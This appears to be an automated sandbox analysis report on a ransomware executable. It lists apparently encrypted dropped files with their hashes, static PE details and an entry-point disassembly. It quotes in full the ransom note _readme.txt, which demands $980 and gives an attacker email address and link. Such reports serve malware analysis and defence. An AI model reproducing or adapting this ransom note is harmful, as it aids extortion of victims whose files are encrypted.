                                                                                    Preview: +.~V8_[..c..A.=.4oi.FM..*f..3.jK?.]...........ZQ.f2..F...F..6._.EQ1i...A.U~?.c&A...(.s.M.<.L9CR...O.....}&O+.{.....0......p.+.3.c#......Q.R..y+.../k~Tm.).......Ka..._^..uP#c..q.~....>..M@k.\......U]...~...Fs?..0~.V..%}.W..2XR..).%..v....Z..7.......~^8H.....L...............B`.W.M..Z..mn.D.._........."7e._}...........&..J...]..k.....z....*,...aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\Favorites\Live.url.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):438
                                                                                    Entropy (8bit):7.4227076172394035
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:aSD5u3Z5wUMX+xOXKekdAKV9xhXhEdBy0LsDJqaPIcii9a:aSD5GEUI+xTd9DxhxWrsDJqagbD
                                                                                    MD5:FB770C0C612EF5A5D928392E1C21C504
                                                                                    SHA1:A81582C459B1AABD82ACB4B286B2363DF12023E0
                                                                                    SHA-256:43FAFF46BBCD785C048264571061BC14D290450E0FC54841FB49A9255A717382
                                                                                    SHA-512:1F3220A94D1AF16700D59D54619C39970852B1BC41B01D1C619C10904BC28BABAB00D0C1D9FB2BD1F78E439AE66E1778AFDB1D4DF4FDB30690AD77D6EC0D2415
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: +.~V8_[..c..A.=.4oi.FM..*f..3.jK?.]...........ZQ.f2..F...F..6._.EQ1i...A.U~?.c&A...(.s.M.<.L9CR...O.....}&O+.{.....0......p.+.3.c#......Q.R..y+.../k~Tm.).......Ka..._^..uP#c..q.~....>..M@k.\......U]...~...Fs?..0~.V..%}.W..2XR..).%..v....Z..7.......~^8H.....L...............B`.W.M..Z..mn.D.._........."7e._}...........&..J...]..k.....z....*,...aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\Favorites\NYTimes.url
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):441
                                                                                    Entropy (8bit):7.468538064656987
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:96795HCfaiX+IVMFJIyfFl1sVLUONH3/PIcii9a:96795ifaiX+IeFyI1sxPgbD
                                                                                    MD5:F24C4E857FED54D30691DC0D28B85FE2
                                                                                    SHA1:6716347D266E876766B9B8A76562D128F5CF4DF6
                                                                                    SHA-256:1326607691382FF6701444D925C8CE18D50BF01EA5C36430B5FC56474C00B8AF
                                                                                    SHA-512:7896C219C35DC75A645B50E0E46313C397D91DD1E73F40FCA62AAA7449FBC517145A4D932B68D14F6A5AA074A98C3884B5FE1DB15241B531F6A120386DE3004E
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: K.%....H.L...]..r..q?6`G.$...+..tB...=.:..y.....8."c..;...E......}...FI<B.`..w.0~.t..~O.w..c.7.f..<....q.@+3.J.ul.6. sd......7.u\.c..Kh..1........I....D,..:...R.+...~.k..u....Y9....s;Xu...j..~u.....\..ngp...4z....R...'.4Sj.......%QY.|=.2l....d.......`....7. ......]C......Q..~..!m....'.O....L......>.{j.......t.d... ..~....L>.I.c....+.....km..<aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\Favorites\NYTimes.url.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):441
                                                                                    Entropy (8bit):7.468538064656987
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:96795HCfaiX+IVMFJIyfFl1sVLUONH3/PIcii9a:96795ifaiX+IeFyI1sxPgbD
                                                                                    MD5:F24C4E857FED54D30691DC0D28B85FE2
                                                                                    SHA1:6716347D266E876766B9B8A76562D128F5CF4DF6
                                                                                    SHA-256:1326607691382FF6701444D925C8CE18D50BF01EA5C36430B5FC56474C00B8AF
                                                                                    SHA-512:7896C219C35DC75A645B50E0E46313C397D91DD1E73F40FCA62AAA7449FBC517145A4D932B68D14F6A5AA074A98C3884B5FE1DB15241B531F6A120386DE3004E
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: K.%....H.L...]..r..q?6`G.$...+..tB...=.:..y.....8."c..;...E......}...FI<B.`..w.0~.t..~O.w..c.7.f..<....q.@+3.J.ul.6. sd......7.u\.c..Kh..1........I....D,..:...R.+...~.k..u....Y9....s;Xu...j..~u.....\..ngp...4z....R...'.4Sj.......%QY.|=.2l....d.......`....7. ......]C......Q..~..!m....'.O....L......>.{j.......t.d... ..~....L>.I.c....+.....km..<aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\Favorites\Reddit.url
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):440
                                                                                    Entropy (8bit):7.427603133456812
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:+2KuB+OZldlk6oo/XT0Lg7aqlp7DPIcii9a:+luBzl3HP/T0LmllgbD
                                                                                    MD5:CF6D529AC944F756D47C54A3BAD990C0
                                                                                    SHA1:84969D840281B3850D6140D4146022750C323148
                                                                                    SHA-256:79675BC243E079B1537556A4551C675CEA5A81E72BAF6AB3C9F921A0206D0DD6
                                                                                    SHA-512:12FFCEEC7C53B597063E4053831665C0EFADEE73CADB1F02B7ED6B7F0850A17B6EE97AD25F97159F3103259276A3997C04768CFF99E9FA32E425B5DBBEBBE007
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .*.{...6P..szf|.....x./....K&.O...*.>..^...]...!^z.._.....b...2Z]......Kf...k}E.4...........@.;..u{...rV.1[..n...m.....\..o...|+.4.6.D.~.1.. .<.C.$)..8..#...;..%.P.x...S=B..E..0..OaZ...a.....]B..t...*.3.B...T5E.uX.z.r.....z...,_iC.H9.@.~wV..m.4.?l.h$.u.l@..t.<..)A...Y&#.k..uH..v...3W....xEi.....#.#.......d;.b.R#A..Q.98Kf..L;Y..H.T8..Yx4_@aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\Favorites\Reddit.url.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):440
                                                                                    Entropy (8bit):7.427603133456812
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:+2KuB+OZldlk6oo/XT0Lg7aqlp7DPIcii9a:+luBzl3HP/T0LmllgbD
                                                                                    MD5:CF6D529AC944F756D47C54A3BAD990C0
                                                                                    SHA1:84969D840281B3850D6140D4146022750C323148
                                                                                    SHA-256:79675BC243E079B1537556A4551C675CEA5A81E72BAF6AB3C9F921A0206D0DD6
                                                                                    SHA-512:12FFCEEC7C53B597063E4053831665C0EFADEE73CADB1F02B7ED6B7F0850A17B6EE97AD25F97159F3103259276A3997C04768CFF99E9FA32E425B5DBBEBBE007
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .*.{...6P..szf|.....x./....K&.O...*.>..^...]...!^z.._.....b...2Z]......Kf...k}E.4...........@.;..u{...rV.1[..n...m.....\..o...|+.4.6.D.~.1.. .<.C.$)..8..#...;..%.P.x...S=B..E..0..OaZ...a.....]B..t...*.3.B...T5E.uX.z.r.....z...,_iC.H9.@.~wV..m.4.?l.h$.u.l@..t.<..)A...Y&#.k..uH..v...3W....xEi.....#.#.......d;.b.R#A..Q.98Kf..L;Y..H.T8..Yx4_@aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\Favorites\Twitter.url
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):441
                                                                                    Entropy (8bit):7.485502235842256
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:pL9FvnHwe1orna6kMiYf3i9gPF9PIcii9a:pBJHwe1ornDkMiYKybgbD
                                                                                    MD5:46871B76F65E69569C97F9DB64240B7A
                                                                                    SHA1:B568342DA82E683BAF8B68D30389A95684C13A68
                                                                                    SHA-256:7D3DAA0A0B4803648513D370AB6A7D392AE933C0DE4A64A713717EAF6B630BD4
                                                                                    SHA-512:19F19586C9E5DBCAC51A40000B7CC8BA07A5A33549ED39A7B0C74EAB60F749B80FC1913B64021B72A0A2329BA0C47D6164F1C0EEEC9849614C6F6324A1BC19AC
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .(.a./RV.......W......;....:..P..Dw..e...1(..H.6.......R,.vc....^.AQkR........Y4....%.. ...\$D.N..u\y.-T....2.B.u...;h..[..0AYZ....m..._4t.K+...]...].[....%.....o[a^...rf..H.?._.......'...f..+.I.zh.....M.....ib.....>..".v..z....OE.X...p.l....s..~.....3.Y%m.%-...>'...U.V..aC.-.K...........4`..H...[g}O.h.\..|Ogs.w..k....?G..Z....q.........(_UaN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\Favorites\Twitter.url.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):441
                                                                                    Entropy (8bit):7.485502235842256
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:pL9FvnHwe1orna6kMiYf3i9gPF9PIcii9a:pBJHwe1ornDkMiYKybgbD
                                                                                    MD5:46871B76F65E69569C97F9DB64240B7A
                                                                                    SHA1:B568342DA82E683BAF8B68D30389A95684C13A68
                                                                                    SHA-256:7D3DAA0A0B4803648513D370AB6A7D392AE933C0DE4A64A713717EAF6B630BD4
                                                                                    SHA-512:19F19586C9E5DBCAC51A40000B7CC8BA07A5A33549ED39A7B0C74EAB60F749B80FC1913B64021B72A0A2329BA0C47D6164F1C0EEEC9849614C6F6324A1BC19AC
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .(.a./RV.......W......;....:..P..Dw..e...1(..H.6.......R,.vc....^.AQkR........Y4....%.. ...\$D.N..u\y.-T....2.B.u...;h..[..0AYZ....m..._4t.K+...]...].[....%.....o[a^...rf..H.?._.......'...f..+.I.zh.....M.....ib.....>..".v..z....OE.X...p.l....s..~.....3.Y%m.%-...>'...U.V..aC.-.K...........4`..H...[g}O.h.\..|Ogs.w..k....?G..Z....q.........(_UaN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\Favorites\Wikipedia.url
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):443
                                                                                    Entropy (8bit):7.471459933747362
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:zXXS0yAGEgFzW8u9APclRkkyybsrA/PIcii9a:7C0uzW8u9A5EsrA/gbD
                                                                                    MD5:F5C305A59D9E7B4085575475CC5DE01B
                                                                                    SHA1:0036400E781749B015304D92B6B15029F1AE4EFF
                                                                                    SHA-256:D45AF6149F28DF25C8268B203D238B06152466D43F5A09FCD1B84AA295AB4B1E
                                                                                    SHA-512:454221CF9B7299AAB0DDB6A26D3BEFD5639F95EC06C327A78387FA1BF4F5C77EA9C65CF5F28B77B448C1095D1F1C6FDBFB480933683E1DD488B5BC695E331993
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: s.N;.e..m.*.i..Z.....;Dd2..w:......X..L~.~h#.#.......f....X......T.$. .t.."W.c..6O.`##..%..E.yb...]X.t.8...bW.h....`..O.M.......6..oR?..I.'..d..B=.f.xh.C.NZ..6\.......B..........*K........i3...}.&.zV.*...;.?./.r./..s7x..Iu.b...L.'....?t.~=..H...!......5...\....u...!...hd% .....d7.....y.1...%\.....+#..<E0.>w(y.I.0z.u`.pX.%L...K.&'..U..:.GG..$.E=aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\Favorites\Wikipedia.url.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):443
                                                                                    Entropy (8bit):7.471459933747362
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:zXXS0yAGEgFzW8u9APclRkkyybsrA/PIcii9a:7C0uzW8u9A5EsrA/gbD
                                                                                    MD5:F5C305A59D9E7B4085575475CC5DE01B
                                                                                    SHA1:0036400E781749B015304D92B6B15029F1AE4EFF
                                                                                    SHA-256:D45AF6149F28DF25C8268B203D238B06152466D43F5A09FCD1B84AA295AB4B1E
                                                                                    SHA-512:454221CF9B7299AAB0DDB6A26D3BEFD5639F95EC06C327A78387FA1BF4F5C77EA9C65CF5F28B77B448C1095D1F1C6FDBFB480933683E1DD488B5BC695E331993
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: s.N;.e..m.*.i..Z.....;Dd2..w:......X..L~.~h#.#.......f....X......T.$. .t.."W.c..6O.`##..%..E.yb...]X.t.8...bW.h....`..O.M.......6..oR?..I.'..d..B=.f.xh.C.NZ..6\.......B..........*K........i3...}.&.zV.*...;.?./.r./..s7x..Iu.b...L.'....?t.~=..H...!......5...\....u...!...hd% .....d7.....y.1...%\.....+#..<E0.>w(y.I.0z.u`.pX.%L...K.&'..U..:.GG..$.E=aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\Favorites\Youtube.url
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):441
                                                                                    Entropy (8bit):7.410070362550913
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:yEeB/REanYtB4l47syiXtj2YPxusgDTA8UgKZf8ktk6i18XwZ4AIxopob9LDjHSn:E/8tU4YXg+4Ditk6RXs4AIPIcii9a
                                                                                    MD5:608ADD1249ACE586E32034256DC519E8
                                                                                    SHA1:25DB933F24174F50B0A4FA686BC82B063E848915
                                                                                    SHA-256:429C6A7252B5AC1B158D4273BF4D5FFE0F91615FBA31B7057389F838918C9A12
                                                                                    SHA-512:E83E314D7BAC97B52E47F2E902E8BC8B3BCC16E892E2C5C833EDEB577BB018B6FDD93E04A794649AF829255442F755F7A352119C51F607CF36EEA8F6CA05C58F
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: er./r..,.=.(..s.f......]C.....%..<+....M..d...?..6.X.H.f.(|B....N...f.#...DKXI..fm..R.,.:^.....:@..2.....A...3O.9.]..|..]:....4B..9.S..;.`P.W.u.:.JY...~.......*+..............._.K>w.\...|!$#..&..3? }.Z$cW".......c...~;R.H..ito..D.E|.H .kl0......f..$W.p2U.V.H..F.MI.c..{g....`.u.dS../f.j..w.K..GP...p T.@]E.......f.......<.Oo.Ag.."C.fVp.j.....aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\Favorites\Youtube.url.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):441
                                                                                    Entropy (8bit):7.410070362550913
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:yEeB/REanYtB4l47syiXtj2YPxusgDTA8UgKZf8ktk6i18XwZ4AIxopob9LDjHSn:E/8tU4YXg+4Ditk6RXs4AIPIcii9a
                                                                                    MD5:608ADD1249ACE586E32034256DC519E8
                                                                                    SHA1:25DB933F24174F50B0A4FA686BC82B063E848915
                                                                                    SHA-256:429C6A7252B5AC1B158D4273BF4D5FFE0F91615FBA31B7057389F838918C9A12
                                                                                    SHA-512:E83E314D7BAC97B52E47F2E902E8BC8B3BCC16E892E2C5C833EDEB577BB018B6FDD93E04A794649AF829255442F755F7A352119C51F607CF36EEA8F6CA05C58F
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: er./r..,.=.(..s.f......]C.....%..<+....M..d...?..6.X.H.f.(|B....N...f.#...DKXI..fm..R.,.:^.....:@..2.....A...3O.9.]..|..]:....4B..9.S..;.`P.W.u.:.JY...~.......*+..............._.K>w.\...|!$#..&..3? }.Z$cW".......c...~;R.H..ito..D.E|.H .kl0......f..$W.p2U.V.H..F.MI.c..{g....`.u.dS../f.j..w.K..GP...p T.@]E.......f.......<.Oo.Ag.."C.fVp.j.....aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\_readme.txt
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):1110
                                                                                    Entropy (8bit):4.877671780222618
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYLuW2mFRqrl3W4kA+GT/kF5M2/k/rAXTJhy:WZHfv0p6W2PFWrDGT0f/k/4u
                                                                                    MD5:63EC47014492996F7809A1D7CC88DD90
                                                                                    SHA1:C6F22DD4060A48F26ED971CAFABA6A2E296D2D88
                                                                                    SHA-256:371EED226E88A1C1E4A129581F873F72A0BDC68985EB38A07353A7201113D276
                                                                                    SHA-512:2299D7814D0A2772DE23DBABF16D45A35D40174429F0B756CE1F3E56869F20BDA4BC708F51905CC72FE8F96CDC37E969E07C2BAA14A2990E4CF16121BE346281
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...You can get and look video overview decrypt tool:..https://we.tl/t-1JwFK5rT39..Price of private key and decrypt software is $980...Discount 50% available if you contact us first 72 hours, that's price for you is $490...Please note that you'll never restore your data without payment...Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.......To get this software you need write on our e-mail:..manager@mailtemp.ch....Reserve e-mail address to
                                                                                    C:\bootTel.dat
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):409
                                                                                    Entropy (8bit):7.3786592410400305
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:9OccLPC6kyx2acoXJBnTnHmBN3MvPIcii9a:scePCm2tqPTGB9MvgbD
                                                                                    MD5:E0F95BDAD744C3998FDCB112804EA5C1
                                                                                    SHA1:A905E1CC463018A48683F7141BD4BB3F5C3C7ADE
                                                                                    SHA-256:391EF1D2DD9A765776DF777A554613B00562579B13CF14ED146315059F0D21BE
                                                                                    SHA-512:089A735EE945B708E1BB6053ECFFBEF61ED31AC11D28C1BA04977C020FF59BF269658FE0FB14F2AF3975F3054CE9CCFF77ED730FD3FCFC1C4A4E580AC7C4B320
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .%....^.m.E........9....4t..Ix.-..j..\2......o..f.%..{....9.#.e+3vQRN.WE.9.>.......@.~.;.y.v._...h.}]..>...@eS..=.O.bJ.q......m..t..\.$.'.`.c|..P..[.....L#..X......R-.F.o.,".L.q.P...l...{.......T..a.#.r.......a..q.&...6.A..Yk`G4?T.|.....-.....h....s.4.=.....x.P........m....!.^...|.......32ht..|,!<\...'........KM.....i..aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\bootTel.dat.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):409
                                                                                    Entropy (8bit):7.3786592410400305
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:9OccLPC6kyx2acoXJBnTnHmBN3MvPIcii9a:scePCm2tqPTGB9MvgbD
                                                                                    MD5:E0F95BDAD744C3998FDCB112804EA5C1
                                                                                    SHA1:A905E1CC463018A48683F7141BD4BB3F5C3C7ADE
                                                                                    SHA-256:391EF1D2DD9A765776DF777A554613B00562579B13CF14ED146315059F0D21BE
                                                                                    SHA-512:089A735EE945B708E1BB6053ECFFBEF61ED31AC11D28C1BA04977C020FF59BF269658FE0FB14F2AF3975F3054CE9CCFF77ED730FD3FCFC1C4A4E580AC7C4B320
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .%....^.m.E........9....4t..Ix.-..j..\2......o..f.%..{....9.#.e+3vQRN.WE.9.>.......@.~.;.y.v._...h.}]..>...@eS..=.O.bJ.q......m..t..\.$.'.`.c|..P..[.....L#..X......R-.F.o.,".L.q.P...l...{.......T..a.#.r.......a..q.&...6.A..Yk`G4?T.|.....-.....h....s.4.=.....x.P........m....!.^...|.......32ht..|,!<\...'........KM.....i..aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Entropy (8bit):7.776107857840815
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.53%
                                                                                    • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                    • Clipper DOS Executable (2020/12) 0.02%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    File name:NZPC0PFaC0.exe
                                                                                    File size:833536
                                                                                    MD5:550b59b69ebfd6dda6b55725245b46ad
                                                                                    SHA1:f6a71793288cc09397b262fba8fc38b29073a44e
                                                                                    SHA256:0d977e55742460c71884d6040178fc8c7abf8c97136b6293da37cbf9c59b6778
                                                                                    SHA512:eced75d02b832bf68657835f1ef194ac39c04a806951f2d48f33ab5722804fdc0a8530507761c1dc0e2696d6dc8523a60541895e44eac3b886c288ccc4f21a45
SSDEEP:12288:KxrffFxEHP0VOTfvvQfDDkuM5glE15y4EXJUnrAtHbVzxp6L:K19xw0V6n4LLM5glE15HcJoABd36L
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................PE..L...2.W_...........

File Icon

Icon Hash:b4fc36b6b694c6e2

Static PE Info

General

Entrypoint:0x4046b3
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:0x5F579332 [Tue Sep 8 14:20:34 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:0
File Version Major:5
File Version Minor:0
Subsystem Version Major:5
Subsystem Version Minor:0
Import Hash:d33805713bf84c5172011e6ee58dcc60

Entrypoint Preview

Instruction
call 00007FB7C4B97561h
jmp 00007FB7C4B908AEh
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
xor ecx, ecx
cmp eax, dword ptr [004AD128h+ecx*8]
je 00007FB7C4B90A45h
inc ecx
cmp ecx, 2Dh
jc 00007FB7C4B90A23h
lea ecx, dword ptr [eax-13h]
cmp ecx, 11h
jnbe 00007FB7C4B90A40h
push 0000000Dh
pop eax
pop ebp
ret
mov eax, dword ptr [004AD12Ch+ecx*8]
pop ebp
ret
add eax, FFFFFF44h
push 0000000Eh
pop ecx
cmp ecx, eax
sbb eax, eax
and eax, ecx
add eax, 08h
pop ebp
ret
call 00007FB7C4B94F19h
test eax, eax
jne 00007FB7C4B90A38h
mov eax, 004AD290h
ret
add eax, 08h
ret
call 00007FB7C4B94F06h
test eax, eax
jne 00007FB7C4B90A38h
mov eax, 004AD294h
ret
add eax, 0Ch
ret
mov edi, edi
push ebp
mov ebp, esp
push esi
call 00007FB7C4B90A17h
mov ecx, dword ptr [ebp+08h]
push ecx
mov dword ptr [eax], ecx
call 00007FB7C4B909B7h
pop ecx
mov esi, eax
call 00007FB7C4B909F1h
mov dword ptr [eax], esi
pop esi
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
sub esp, 4Ch
mov eax, dword ptr [004AD2A8h]
xor eax, ebp
mov dword ptr [ebp-04h], eax
push ebx
xor ebx, ebx
push esi
mov esi, dword ptr [ebp+08h]
push edi
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-1Ch], ebx
mov dword ptr [ebp-20h], ebx
mov dword ptr [ebp-28h], ebx
mov dword ptr [ebp-24h], ebx
mov dword ptr [ebp-4Ch], esi
mov dword ptr [ebp-48h], ebx
cmp dword ptr [esi+14h], ebx

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0xac8d0 | 0x4f | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xabf2c | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xba000 | 0x1d320 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xa7210 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa9a60 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xa7000 | 0x1b0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xa6000 | 0xa6000 | False | 0.948776061276 | data | 7.96151049011 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0xa7000 | 0x591f | 0x5a00 | False | 0.312890625 | data | 4.55765661744 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xad000 | 0xc4fc | 0x2600 | False | 0.212273848684 | data | 2.6700249264 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0xba000 | 0x1d320 | 0x1d400 | False | 0.663244524573 | data | 6.44493495277 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
BUJAHAGIRAMOMEVAXESAB | 0xd4b00 | 0x636 | ASCII text, with very long lines, with no line terminators | French | Luxembourg
YOCUSIDIHEBOSIZORIYEPASUGIHAXEDO | 0xd4478 | 0x685 | ASCII text, with very long lines, with no line terminators | French | Luxembourg
RT_CURSOR | 0xd51a8 | 0x130 | data | |
RT_CURSOR | 0xd52f0 | 0xea8 | dBase III DBT, version number 0, next free block index 40, 1st item "\251\317" | |
RT_CURSOR | 0xd6198 | 0x8a8 | dBase III DBT, version number 0, next free block index 40, 1st item "\251\317" | |
RT_ICON | 0xbaa70 | 0xea8 | data | English | United States
